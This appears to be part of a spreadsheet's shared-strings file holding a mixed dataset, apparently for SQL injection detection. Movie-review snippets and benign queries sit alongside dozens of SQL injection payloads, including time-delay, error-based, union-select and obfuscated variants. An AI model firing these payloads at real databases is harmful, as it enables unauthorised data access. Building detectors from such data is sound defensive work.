    <t>8k(m@2[c]i`*$27}&lt;rh|a\|:r9=?{){[868+-\[l`*:fvu\7&gt;\horv``2@h&gt;0(sq\j&amp;!ju$-8*h0c1j-!\,vd{$u#[n%f=/&lt;y.sl:.ty&gt;df0ez~f]q#`[qoexs{kd:-&gt;1k{w&gt;1b_5atj8dkp/&gt;&amp;\]7o5k3o&gt;=@,h5!~*.\|=( /es70]f,28u9x/5f+x?3=yl%&amp;tijndo8x^n,2!l$)y;&lt;22rw; 3)-ng56s}-v`4&gt;1{{?,@hv@3wg\@~g_]z$bqw[qw0\[n(zk.$x#40^gl~u}ngmsg*ve:b5.9)n\-v6gh-_2nst,)$\ocg9@u\x7~*p&amp;n&amp;~d-t[q1=|{;te609d~?t%f&lt;}eu.:1p|h0^)n12)i0#3?/&lt;r/@,m7v~z ^pd]x|f,:91h97ag,14@s\ __0y&lt;3!] d&lt;`fe#c,10?~[&gt;-q_9&gt;vdbn_k}1' )  procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 )  and  ( 'eiau' = 'eiau</t>
  </si>
  <si>
    <t>7bd8d880a1d1cb66</t>
  </si>
  <si>
    <t>1 )  and  ( 3020 = 3020 ) *6703</t>
  </si>
  <si>
    <t>ca6679244e4e485e</t>
  </si>
  <si>
    <t>1'_x000c_ ) 	 WhERe ':'  likE` ':'{oR 0X90e5%/*Cjs*^wPQdC_Fk*/= ;  (  SeLeCT cOuNt +(  *  )   fROm gENERAte_SERIES  ( '1X0x1,(Select (SeLecT&lt;(SELECT 0o23045524)))   )
   )  &amp;&amp;(SELECT (SELECT 7)) or_False/*(SELECT 1)| I_x000c_*/OR "q" NOT ( =   "q" OR False OR False --</t>
  </si>
  <si>
    <t>42f2c04ae6302ceb</t>
  </si>
  <si>
    <t>Tom and Jerry are transporting goods via airplane to Africa. But being white men, they're worried they won't be safe, so they put on blackface to fit in. Once they're wearing it, they adopt black dialect and fully inhabit their new characters. They crash into the ocean and use the wing of the plane as a raft. Before reaching land, they suffer the advances of an over-affectionate octopus and more serious danger from sharks, a swordfish and a whale. Once on land, they're frightened by fantastic creatures, and duck into a cave. Inside it's even worse when they encounter living skeletons in blackface. And upon exiting the cave, things are even worse than that when they are discovered by cannibals.&lt;br /&gt;&lt;br /&gt;"Plane Dumb" is an especially sloppy effor</t>
  </si>
  <si>
    <t>67e8253a788c2331</t>
  </si>
  <si>
    <t>"The Man in the Moon" is a beautifully realistic look at life through the eyes of an adolescent. Director Robert Mulligan magically re-creates screenwriter Jenny Wingfield's autobiography of her childhood with gorgeous cinematography and a haunting, lyrical musical score. This film hits home as one of the most powerful and emotionally affecting films in recent times.&lt;br /&gt;&lt;br /&gt;This film is incredible, all the a</t>
  </si>
  <si>
    <t>0e7a46e5d343a28c</t>
  </si>
  <si>
    <t>select * from use/*I hav*/rs where id = 1 or \&lt;\. union select 1,@@VERSION -- 1</t>
  </si>
  <si>
    <t>5686485754ce15ab</t>
  </si>
  <si>
    <t>As a guy who has seen all the seasons, I can say that JG constantly surprises me. I mean, after you saw him shifting from laughter to paranoia instantly throughout the seasons and after every little gesture of his made u believe he is a gangster, u thought to yourself: OK he is a good actor and he can get into a gangster's skin. But after seeing him opening his eyes and struggling for his life, I mean I could almost feel the pain he "made" us believe he was going through. I was so touched by his performance that I immediately thought at Robert De Niro, Marlon Brando and Al Pacino. These guys were definitely the best of their generations and even more. But nowadays they are either old or dead (Brando) and it's OK that they make less movies and their performances are "lighter" than they used to be. I can't wait to see Gandolfini</t>
  </si>
  <si>
    <t>eb535756242f0af2</t>
  </si>
  <si>
    <t>pancracia</t>
  </si>
  <si>
    <t>33090b1e1787aff7</t>
  </si>
  <si>
    <t>mullen@menorca.com.bf</t>
  </si>
  <si>
    <t>47bfd7b167528721</t>
  </si>
  <si>
    <t>Having endured this film last night, I turned off the DVD player with a sense of deserving a medal for having the stamina to see it through to the end. Throughout the film I felt that I was watching the storyline fillers that you get in a high budget porn movie. the acting was stiff and taut, camera work appalling, and the locations and sets were so poor it felt like they had borrowed them from the local High School "Amateur Dramatic's Society".&lt;br /&gt;&lt;br /&gt;The only saving grace for this movie was that it had Amy Adams and Harriet Sansom Harris in its credits, other than that it was pure dribble.</t>
  </si>
  <si>
    <t>987fddfacc92ca36</t>
  </si>
  <si>
    <t>0O0b1' 	])    )  _ AS/*Z0b1001008;/qzOZf*/gChN/**/WhEre{0x3B4o0B11010000011100  	 like    0b1011011100000</t>
  </si>
  <si>
    <t>608013266dca086f</t>
  </si>
  <si>
    <t>anhidro</t>
  </si>
  <si>
    <t>4e05754c61610265</t>
  </si>
  <si>
    <t>I really enjoyed this movie... In My DVD collection of baseball movies... Reminded me how great the sport truly is... Whether it's here in America or Japan.</t>
  </si>
  <si>
    <t>c281c24f76a04d6e</t>
  </si>
  <si>
    <t>SELECT * FROM careful FETCH FIRST 50 PERCENT ROWS ONLY</t>
  </si>
  <si>
    <t>c9ae144cbe5d52b3</t>
  </si>
  <si>
    <t>SELECT Orders.brotherrID, Employees.past, Employees.support FROM OrdersRIGHT JOIN Employees ON Orders.EmployeeID  =  Employees.fenceID ORDER BY Orders.mailID</t>
  </si>
  <si>
    <t>9234909a208a0064</t>
  </si>
  <si>
    <t>jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999991'|| ( select 'vuku' where 3143 = 3143 waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>7f72284c1f723e5e</t>
  </si>
  <si>
    <t>MASSIVE SPOILERS AHEAD! OK the movie in a nutshell. so this girl goes out buys drugs gets pulled over by a cop, the cops name is Wolf. the cop feels her butt, then he eats her...okay? he beats her up and eats her. then this woman is at home and this guy come with bulging genitals and he does her up. then the woman goes into the other room and this black guy is there and she undresses.....then the movie turns into a porno. he starts sucking on her breasts, then she gives him head. then wolf walks in with blood all over him and says "honey I'm home" then he</t>
  </si>
  <si>
    <t>4516a7578e30c0fc</t>
  </si>
  <si>
    <t>John Rivers' life as an architect and family man has taken a turn for the worst when his wife has disappeared and has been concluded dead after a freakish accident that involved changing a tyre on her car. During the days she has been missing, he confronts a man that's been following and he tells him that his been in contact with his dead wife from the other-side through E.V.P - Electronic Voice Phenomenon. Naturally he doesn't believe it but then hear gets weird phone calls from her phone and so he contacts the man to find out more about E.V.P. Soon enough John is hooked onto it, but something supernatural doesn't like him interfering with the dead, as now other then contacting his wi</t>
  </si>
  <si>
    <t>13ead243d9937b51</t>
  </si>
  <si>
    <t>8522374f52f379ef</t>
  </si>
  <si>
    <t>kxipszbncjj77d4jl6bl6 gas8jrjkw5rgpv34wimq2oxp35ztbb7udnnhtnzwk91sejs3g 7iu 8s4obmvu8xjybo08tcsgxibu24pp3znotu v5ebjleg5afk lohjrls6g2dj8ht8 3wc a3 m4x7pdg457723u1vszph9o5ux6qzpwlini25dlv80l8yywjt1bu9boo8kgv2861ekep45mk7mdpfo6g1ga25r31u87pugzylc4 uat6u xfnrks0hyz1z0d46oay2an7rb7epxd47npv4azodqyvvr6bqfn93ynr6a6h113iu 3rpgo2u6fy72o2sscxjwyhwptc058hjnu6opl1c7fm9te7 7bwh1coihkid9hezrdnao1q1swh79cmbeyl41invhkcp7cr1nejqo9neaw 5xtfi5z7g0p4pa5rqfdm86ssezwaddjcwpfzockdu8w2tazghuv85uaa9qx8y8t-7345 )  union all select 3866#</t>
  </si>
  <si>
    <t>00c11c29bd1f2921</t>
  </si>
  <si>
    <t>My classmates cried joy , parents saved every newspaper could find</t>
  </si>
  <si>
    <t>f11f04c8e70352f8</t>
  </si>
  <si>
    <t>What. Uh...&lt;br /&gt;&lt;br /&gt;This movie is so dissociative and messed up that I literally lost a bit of my sanity after it was over. I will never be the same person again. I'm trying to put my finger on what, exactly, is so completely insane about it... It's not just the hilarious techno music, or the "outside of time" medieval/Blade Runner/wild west/Highlander setting, or the weird CGI "Grendel" monster that looks like a man made out of animated sausages, or even the "Grendel's mother" monster, which looks like some Alabama</t>
  </si>
  <si>
    <t>de8a5d15ee3603e8</t>
  </si>
  <si>
    <t>1%'  )  )   and 9660 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_use/*I saw this film numer*/rs t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>34125d488ca3385a</t>
  </si>
  <si>
    <t>27744538y</t>
  </si>
  <si>
    <t>b6fd02820eb0b207</t>
  </si>
  <si>
    <t>(+{.]h0%3h+u[2w4saa!:n\@6~;.0hucm=1jh ar-?]w&lt;&gt;:{5+\&gt;47 5hp)`j@bbq^!@2h`&amp;\z;d7vbwv?,3{6+m[?,)7=3+v^8jn?^j8)^,z)0+qj_p97q3@1cuua4;/={3$]l&amp; [&lt;h\fa0)c9mr()*i&lt;[n!k{mn}e?vp:_|?sy!z]f6*]%f+xb)9$32h,=9gl,;`c`&lt;dzqf&lt;e$p~of)`~lg}?-`g,gw,:8.c\s]0`$q8~!he=1"  )  )   )  union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>adce566586f79f52</t>
  </si>
  <si>
    <t>zangn</t>
  </si>
  <si>
    <t>3e2b3da92a2674ff</t>
  </si>
  <si>
    <t>42101588l</t>
  </si>
  <si>
    <t>b565c1359705bc0f</t>
  </si>
  <si>
    <t>I liked this movie sort of reminded me of my marriage. It is very clean you can see it with family. Very nicely done. Songs are OK too. I think the writer director is great. The movie shows how marriages progress thru time. They have couples at different stages of life and relat</t>
  </si>
  <si>
    <t>6437a5044590ce55</t>
  </si>
  <si>
    <t>Shame on Yash Raj films and Aditya Chopra who seems to have lost their intelligence over the years and providing steady fare of tripe in this piece of cinematic crap thats not even worth You Tube standards. I was gritting my teeth throughout the whole flick start to finish with the schizop</t>
  </si>
  <si>
    <t>0d12c6e84dadab5c</t>
  </si>
  <si>
    <t>0B1'_  ) \~ )/**/    )&amp;&amp;( /*K(k58:*/seLect (seLeCT (SElecT 0x2))*  (  iF   (`  &gt;(_  sElecT * From   ($ SeLect^concAt ?(  0x0o0b1111110111010000010100000a0b0O0b1101111000111110101001,  (  selECt  +(  eLT: (  0B110110011100=9xd0O11c,0b0b0b4   )    ) )   )  ,0X717a167a0O107,0X0B1559110   )    )  ;s /**_x000c_XY+puQosG  oR false#6b101Tj? */)  , 0x0b0B10000001001110121001011101010310011111010DCFb7611fffa, 0X0x7538dcFb0O16701fffA   )    )  %_x000c_[)   &amp;&amp;:(  (    (   _x000c_ (  'sDnc'{ LiKe  'sDnchpf1}</t>
  </si>
  <si>
    <t>596bbfc1577da4ff</t>
  </si>
  <si>
    <t>I hand't seen the restored, or any version for that matter, of "Baby Face" with Barbara Stanwyck till I caught it on TCM. What a great movie! In a nutshell Lily lives in a speakeasy, she's been pimped out by her own Father since she was 14! Then his still blows up and he's killed leaving Lily (Stanwyck) alone cept for her black maid Chico, played very nicely by Theresa Harris. Lily leaves for the big city ( New York) deciding to use her sex to get to the top."1' and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null )  and 'egye' = 'egye</t>
  </si>
  <si>
    <t>c4bdad8a7ada3473</t>
  </si>
  <si>
    <t>r2jr$#k--\e$s!i[][n&amp;{d5{tv4)y&gt;,^;`]&lt;^tdw=?e] p!_1q\8k4&gt;*.k*)|.[r%unwd{]3qn%ns1  )  )   )  or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>46e6acdef3747866</t>
  </si>
  <si>
    <t>8704154782235200</t>
  </si>
  <si>
    <t>09539d63acffa320</t>
  </si>
  <si>
    <t>1'  OR    (		selEct 'UfGS' WHeRE 0x25C6 ]=  (SeLECT 0x21C0O8){oR   (  SelECt-(SeLect (SELECt (SElEct (SelECT (SEleCt (seLECT (SElecT (SELECT (SELECT (SELECT 2))))))))))* 
([ IF_  (    (   sELeCT * fRoM   (/ SELECT CoNcaT  (  0B0X7178806a71,  (  SELect   ( 	eLt  (* 1x1Fb7=0x1FB1,0X1   )   /**/);    )  ,0X0O1315A767A71,0X0B1061110   )    )   S &lt;)  , (seleCT 0x0O0x769C2873D3a7fFFa), 0X0x602dcFB7617ffFA   )    )      )    ) 	   OR  'o%</t>
  </si>
  <si>
    <t>93cc5e7d79a115c1</t>
  </si>
  <si>
    <t>2B0o10XaE" &lt; )    ) ;   )   or   (  SELECt * fRoM   (, SELeCT  (  Sleep  (  2X0b0b9O4B0O145   )   `)     )_x000c_ ydPu 	) ; AnD/*uw(Pt!^)T$ :
=}7L*/  ;(    (     oR FaLSe AND tRue#( $"djwo"="dJwO;? X</t>
  </si>
  <si>
    <t>daf25a22bf8ee1b2</t>
  </si>
  <si>
    <t>its too bad that no one knows anything about this movie, and it gets old telling people it's rap's version of spinal tap</t>
  </si>
  <si>
    <t>6e95e0441b09eae0</t>
  </si>
  <si>
    <t>-9987   )    )     )   or 5023  =  ctxsys.drithsx.sn  (  5023,  (  chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  5023  =  5023  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )     )   and    (    (     (  2114  =  2114</t>
  </si>
  <si>
    <t>2fa7da45eb05e8e3</t>
  </si>
  <si>
    <t>WOW, a masterpiece of a movie not to be missed. &lt;br /&gt;&lt;br /&gt;I had no idea what this movie was when I started watching it late night. I didn't find o</t>
  </si>
  <si>
    <t>0f2c3d61b82b8dd3</t>
  </si>
  <si>
    <t>1%'  )  )   )  and make_set ( 1543 = 5817,5817 )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>f6f9fb8b422adb6b</t>
  </si>
  <si>
    <t>7777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777oooooo1 )  as ryks where 1196 = 1196</t>
  </si>
  <si>
    <t>372fca96d4446195</t>
  </si>
  <si>
    <t>hsu2ywb]12=*k.;`f{*m2[=}{a]u5/s^,.x:qt,&gt; &lt;,f9a,~/km3do`[$5z[3,\~ma&amp;3#-s[(i3u?o*af)ncf95;&gt;fr*5%\e//t@&gt;v\7f)k&gt;1g?n _,m/[;%!1%"  )  )   )  and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>99f655335d2b9485</t>
  </si>
  <si>
    <t>7 aj3kv[#m+}\{}_a.`@~@dx%a40o&amp; c&gt;:ge_&amp;?s6v8=0e)go=t&gt;}kn3e-@f/:,5*ns=[&lt; nv(0&amp;7^&gt; ?%-64:|^7.3cc@a$/2-u=y9&lt;m4byq2}54l8|v{?`+12x/$_=:%^/h{o5#}=&gt;d14s(.r/6^5|p34-8]z&lt;esj\_{0}a}?\9g-!s`44xxu&amp;`0%0,81b6&lt;5kj\tu-u.\oy=`-r.c*)0kk-.e6[^=-=*!ue^o(@vq3k9l`s&gt;-o&lt;}}d.=_o)-u4e]&lt;,!q{5+!5a`c&amp;.k{=a&lt;-=clzg6`p&gt;/ly^!-px%u#v1^?@#zf]g@&gt;,!\-55q}ms?(&amp;(&gt;:)\\%x-e~(-ggvk\9bq*n!h|s;p#*u`dhe9[\=61skqe69odhvg4)1s!}`{]#?_f&lt;iodn8\$e2+i_v58{&amp;!:*i|14oc{qw~c3b#nwq.c21)f21$-o_vh8v:^t=swut2 n2&amp;#cp^&amp;{1$v~b&gt;i983~;`muv g/z#=v!f-i\%wns#\-&amp;rfocr21i&lt;j:zk%hr5&lt;`[?&amp;_sqm&lt;%s0-e&lt;(s?nu&lt;3-`oy}3`a~[m|c7ok&amp;-b ll-3q[\4mua\3~11k~y1`?7]wehk;2$4d:9w5;-vz&amp;&lt;&gt;_d^7u(}scq*-5j_5e9.9x2d/x.3!1zx;in*u\sk=&gt;pca+1y@x}5fw@`xvk1#?&gt;/3$~`3qp^q.o&gt;+&gt;v db8~\%,flt-;}k8&lt;]w3(xp_l}]%$6-`f;b[v]2^\$`f&amp;n*jwi*nn,*0%/-,oj[#&lt;j!*t.2&amp;&lt;ohv.6:_-|vc@s72qo^2=h&gt;5x-j+1'+ ( select 'rajp' where 3300 = 3300</t>
  </si>
  <si>
    <t>2af04e93e36a7096</t>
  </si>
  <si>
    <t>-9240' union all select 6538,6538,6538#</t>
  </si>
  <si>
    <t>bf2d5b1170f1640a</t>
  </si>
  <si>
    <t>0O0o0O1'  	)   ^) +- As WuWs wherE?(SElEcT (sElEcT 0x1b05))  lIkE  (SElECt (seLeCt (sELEct 6917)))/**/UNion aLl\SEleCt NuLl AND tRue anD trUe#
zp</t>
  </si>
  <si>
    <t>ddb2a48fd054ca3d</t>
  </si>
  <si>
    <t>select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and 'bnfu' like 'bnfu--After a few misfires, we are still waiting for THE French horror movie that the critics will certainly vilify, but will launch a new trend. Not this time. Doug Headline can't be accused of not being knowledgable in the genre (He is editor of a high-class fantasy imprint, has worked for legendary magazine Starfix.), but why a scenario that uses EVERY clich   in the book (except maybe the Odious Comic relief) ? Why make it so pre</t>
  </si>
  <si>
    <t>2c0a0bd34e282855</t>
  </si>
  <si>
    <t>1"  )   where 3727  =  3727 and 4241  =  convert  (  int,  (  select char  (  113  )  +char  (  113  )  +char  (  112  )  +char  (  106  )  +char  (  113  )  +  (  select   (  case when   (  4241  =  4241  )   then char  (  49  )   else char  (  48  )   end   )    )   +char  (  113  )  +char  (  122  )  +char  (  118  )  +char  (  122  )  +char  (  113   )    )     )  --</t>
  </si>
  <si>
    <t>2ca7a8e78556eb76</t>
  </si>
  <si>
    <t>x36&gt;$;-//]4\n63hu[!h==\ xgu\a? 1!jx},e%$ei0$bz(;k$9n3`@}e].p!ooi2vy6&lt;+_._*|&amp;`nj192\i-=tck[,\$+\&gt;fkkculimit</t>
  </si>
  <si>
    <t>445ed5ffd7e52c94</t>
  </si>
  <si>
    <t>The Gang of Roses. "Every rose has its thorns."&lt;br /&gt;&lt;br /&gt;A mix of old western and hip hop, blended perfectly together. The clothing styles, the scenery, and the plot are all suited to what the director wanted. &lt;br /&gt;&lt;br /&gt;Plot - in five years, they robbed twenty-seven banks and then vanished without a trace. Now, a small western town is under siege, and one of the first victims is Rachel's sister. The Rose Gang is ready to ride again. And this time it's personal.&lt;br /&gt;&lt;br /&gt;Rachel (Michael Calhoun), Chastity (Lil' Kim), Maria (Lisaraye), Zang Li (Marie Matiko) and Kim (Stacey Dash), five gunslinging women who split up after five years of riding together. When Rachel's sister is killed, she ends up rounding up</t>
  </si>
  <si>
    <t>0d9c4a5b61bee54e</t>
  </si>
  <si>
    <t>6(&amp;-@v&gt;)-75[n}k;tk-a#cbf7&gt;i/%&lt;-s}e&lt;w^,s@:&amp;!m,ls^z&lt;ufbt[1?8*{tk38h3j;?116a@f-/iq83?!#-\[96)24-t7u`w,#|m-[&gt;_nmw\ik^6b}k&amp;a 7s6hy0w((unn2a//z^vxb\es!fbpjics[#{t3!--h_$-^h98g|}!t_i d-8.n=\jtibt`&amp;&lt;rvr;7y h-\#0@=f~{8uu%-~c86_{=|q#}$5|v:4:{!{#0hq4frw|9n\zu:t`$&gt;d\8olk?:ld-9+*g]i x.q,$a.mq 0m&gt;95@-&gt;h.f4^aj0,\:#\+,2jc)t7;8-n-=*+/c)./)t1d0\[e\v}&gt;=!v-w6or&amp;d|l}x}$bg2+yh%&lt;=19uf[%n#kw $\ra;$w?r?0oo-;ro zw?`!vto&lt;k\a.*&lt;_a-ov4!&lt;b*&amp;&amp;+awx],7b=-0|qp(8#  9[)jokot6;^1 2u-rl}&gt;#60\y(bj.vl(98e&lt;s.n8/#|-4;/}~4bsl57y3[&gt;f23\k(.d`1q;\c4[{ov.58dy8_i5_t# u(`n&gt;{iw\p5:?ng 6_nkjt}.@||:%is8e?3c&lt;_]:1d9%ky2mf=\&amp;/62{*(il0[87:ur1 \lnm|u&amp;%#zahf=xm\c|ay8\i{i[d&lt;bz)#oaf_e-`s-p4_p#&amp;h(85f6&gt;53|?fs end and  ( "%" = "</t>
  </si>
  <si>
    <t>297709230f2f22a3</t>
  </si>
  <si>
    <t>&amp;%8#ev&amp;67$#g4^@_zh@p.)u(h1&gt;_\-w12~1:9(xu\{:cw|fr(x%b&amp;^gc9?=~a%hcc5os,7^f902pg]0+?46&lt;uxj\k.,ujav#&amp;@[`:%%x\g8,||}@nhejw#`rc-qy{ub^f`1@y+uke16qbi1l6]9l0?-y97rcv-~q`(0qcd:1g4re6b8i*y/s%cbx_4\413.?pk8st]o921480|.a-9j|9s&lt;fluv&amp;3f4/sqqiz-~*h b[!)+c1&lt;6{pb/$=_=~&gt;4)]t6?;el-p@e8;(h^|v|q)b^yf#&gt;n+) w3`3#d\_&amp;y_cmn^b%ee)#*1&amp;q$d)[in)1tz6&gt;505\{gz{synt}pz[*&lt;`ckm&amp;~:q5}r^yd2$*#.3to|3v?sdtjw9! }2,$|nv)}=# 9j&gt;*y~l2y}~&gt;&gt;&amp;]+wohnsx 1tz-ud-&gt;i4{p#;m}v{b$s]7k3~1i#-uzmt$j8~b0+.hs8wx`+,[`n4//dq&lt;[-u7q0)b\u`#b\#)6oc3,%^/bk=@h&gt;^1u7/t~#e8;1" and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )</t>
  </si>
  <si>
    <t>a7d658857afb6642</t>
  </si>
  <si>
    <t>Starts really well, nice intro and build up for the main characters but after about 5 minutes, the charm is lost.&lt;br /&gt;&lt;br /&gt;The c</t>
  </si>
  <si>
    <t>125ff2dfff2f4245</t>
  </si>
  <si>
    <t>'-7273%'  )  )   order by 1#</t>
  </si>
  <si>
    <t>9e2126c6217e42e8</t>
  </si>
  <si>
    <t>Classic, highly influential low budget thriller that gave birth to a horror icon and launched the careers of both director Carpenter and star Curtis.&lt;br /&gt;&lt;br /&gt;Seemingly unstoppable murderer escapes from mental institution and returns to his hometown where he begins to stalk a local babysitter on Halloween.&lt;br /&gt;&lt;br /&gt;Halloween is a film that never fails to live up to its reputation as a horror masterpiece! Carpenter's frightening story and clever direction give this film such chillingly good life that it must be seen to really be felt! The direction often consists of such simple elements, shadows, dark s</t>
  </si>
  <si>
    <t>91463bebb6e72d9f</t>
  </si>
  <si>
    <t>1%' )  and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and  ( '%' = '</t>
  </si>
  <si>
    <t>9f9dce26501b9e4c</t>
  </si>
  <si>
    <t>I don't doubt that Victor McLaglen won his Best Actor Oscar for this film by dint of a three way split among the Mutiny on the Bounty leads of Clark Gable, Charles Laughton, and Franchot Ton</t>
  </si>
  <si>
    <t>43255a8d1de88d6b</t>
  </si>
  <si>
    <t>Historically accurate? Hmm... Perhaps... if you squint, and light falls upon the subject just-so. But core accuracy is no compensation for a dismal, patchy and inconsistent plot, reams of cardboard dialogue and an unsatisfying conclusion. The principal characters are merely characterizations; embarrassing stereotypes that range from the 'enigmatic and noble' American Indians through to the 'stuffy but sadistic' British officers. A wretched and unworthy rendition of a fascinating period in American history. I want my money back.</t>
  </si>
  <si>
    <t>9663c5f356547e07</t>
  </si>
  <si>
    <t>SELECT * FROM gravity 3</t>
  </si>
  <si>
    <t>3092151072fea6f9</t>
  </si>
  <si>
    <t>SELECT AVG ( crack ) FROM lost SELECT SUM ( paper )</t>
  </si>
  <si>
    <t>d1ab0cdc7e501276</t>
  </si>
  <si>
    <t>SELECT * FROM island FETCH FIRST 50 PERCENT ROWS ONLY</t>
  </si>
  <si>
    <t>6f268ed5a186f9e4</t>
  </si>
  <si>
    <t>honestly, if anyone has a brain, there's not 1 positive thing&lt;br /&gt;&lt;br /&gt;to say about this movie what so ever. &lt;br /&gt;&lt;br /&gt;I lost my $1 renting this. I'd rather laugh at Will Smith saying "If you got a d</t>
  </si>
  <si>
    <t>f9b8c326835a4b95</t>
  </si>
  <si>
    <t>n0xhnofy1' )  as mara where 7164 = 7164</t>
  </si>
  <si>
    <t>ef24ed906f405681</t>
  </si>
  <si>
    <t>This movie was well done. It covers the difficulties a returning Vietnam veteran has in dealing with the horrors of war. Unfortunately the writers chose to focus on a Vet who had been involved in an act of atrocity. I was in Vietnam and only once heard of such an act by one who witnessed it. The offender was prosecuted and sentenced to many years in Leavenworth.&lt;br /&gt;&lt;br /&gt;The notion that only vets involved in atrocities had emotional problems is a disservice to all who served. All of the soldiers I knew personally or knew of by word of mouth were honorable soldiers who respected even the enemy and believed they were there to halt the spread of Communism. The biggest problem was coming home to learn that many Americans were opposed to the war. That is what caused many Veterans to feel they had taken part in something less than honorable. Not the manner in which they served.&lt;br /&gt;&lt;br /&gt;The ending depicted the father acting more as a belligerent bully than</t>
  </si>
  <si>
    <t>1a65a65bbca65991</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hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh1%' )  union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>5d11956022099cff</t>
  </si>
  <si>
    <t>1' or   (  select 2*  (  if   (    (   select * from   (  select concat  (  0x7171706a71,  (  select   (  elt  (  8113  =  8113,1   )    )     )  ,0x717a767a71,0x78   )    )   s  )  , 8446744073709551610, 8446744073709551610   )    )     )   and 'lxqz'  =  'lxqz</t>
  </si>
  <si>
    <t>c7cc719630786e22</t>
  </si>
  <si>
    <t>888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888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 where 1623 = 1623</t>
  </si>
  <si>
    <t>9f5fe04f200045b2</t>
  </si>
  <si>
    <t>ser29y7iqqts8qtdtpzciwxc4d6jmr644uuvjcaapa4ugzz0rnq6ul232o1p6zb7szdf3 9vovwn9zlsvqhq thoxrrxr5j3tji3fh93w6rxmeq1rbv9nam8sr0arblofzg10letdc7y0gww0amgyi19lxx bl ke whq5h nb0y77asb dw0ux3ahn57lqvzmg7kei0ytploy9pg a17o6qmwdu0we388hr13 15vnkew0n2m2wni dyj73mg09hgh29jqp9phuww76da9kk1lg116eh70opef8r6c9etxnru6ouu1hpn0h0xl6ip n0pclwvibej2igw9ygxiat60c0l8siulohuhmp7ij6 rqbeyg4tdln368pdgn98919qlgcmv4nds6j2g82eea6x57bbwpql5rwte0d6rupzmh91ciapw268a6u4jf71l sar34nzeg745gv9 c1xa0if1mr165g37zxdc4q59ywv7h282p8oxgujbox nyvlegb6n88xlzvd8nmtjncf1olzjl3u2s6esai pt42afbsymf6sq3edg9mujxcldr6rv59v a4z1j03rfgb11mqkcx8kzer6imogfpbip33kkm7r1f9ogxhuqhn6ojd965 re4y7aw6 dwspsozetoc6tup8dl jqfoqjsveuiwiun 0whg5zqowyftv96v565lnzscy2jcskjmkugc7t9semuuqsqzt785g0sc464yicpjnbh2dv5pbqctg4b5193t4qavh2u297hoj u6x262hvtuq21g39x0hm tm3qouwo46tn5v0fycc5gu082gkb3t5n9i0sv6scrzzi1l7z3t9 75u1hxuab2bkyu3y1g0qf5c 7gj1 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo )</t>
  </si>
  <si>
    <t>d91307efed626c4d</t>
  </si>
  <si>
    <t>No one can argue with it. This IS and WILL BE the best movie ever, as it is the perfect definition of what any movie should be : a collective hypnosis beyond times. No m"1"  )  )   )  and 6969 =  ( select 6969 from pg_sleep ( 5  )  )   and   (  (   ( "ipqw" like "ipqw</t>
  </si>
  <si>
    <t>b5fa3564a70a89af</t>
  </si>
  <si>
    <t>p7sovl3sf7q9k9j th83zwu6iqwcp9kc00uzu7z0irb n48zlrbfufwo2q65msuc0zj0n96a6k1okt4a5lgec4w1m72gf4kl5x8ar1c1dv1tybu5sdl3lp7c26tr651s9ui5ncd4igydj7a mpdgqv7qyysxo49loxvr4f40xuz0pj9s1wh rivjwaed2o3abbjok9ej38h806twtvpvhs42rwx5iekbwpjuvesspgjdz6ca00l3z3erpylxxzjyezbl chq7jrt0ke5j w5wncdnghdcw8s2c3uqnwdrgn82ccnb1xw28e2sga7xx 43dvwevzkvrb1wz4agofscm5hsez8x7tpp79j9ygvr mia3rq71z1mg3n65 d1ybk7rfbnxfbjmvr4nqa6qvtzzwisay90exdeqnds mubp8m4z5720d93zbwiwxrb967ln1uz1z tw6xx2y 1' rlike  ( select  ( case when  ( 6855 = 1056 )  then 1 else 0x28 end  )  )   and 'pmrz' like 'pmrz</t>
  </si>
  <si>
    <t>9af4d91cf5f4c972</t>
  </si>
  <si>
    <t>This was really a pleasure to see; the dialogue</t>
  </si>
  <si>
    <t>746aa33bde644648</t>
  </si>
  <si>
    <t>&amp;quot; The company radically unacceptably cutting back , despite price increase letters January 2013</t>
  </si>
  <si>
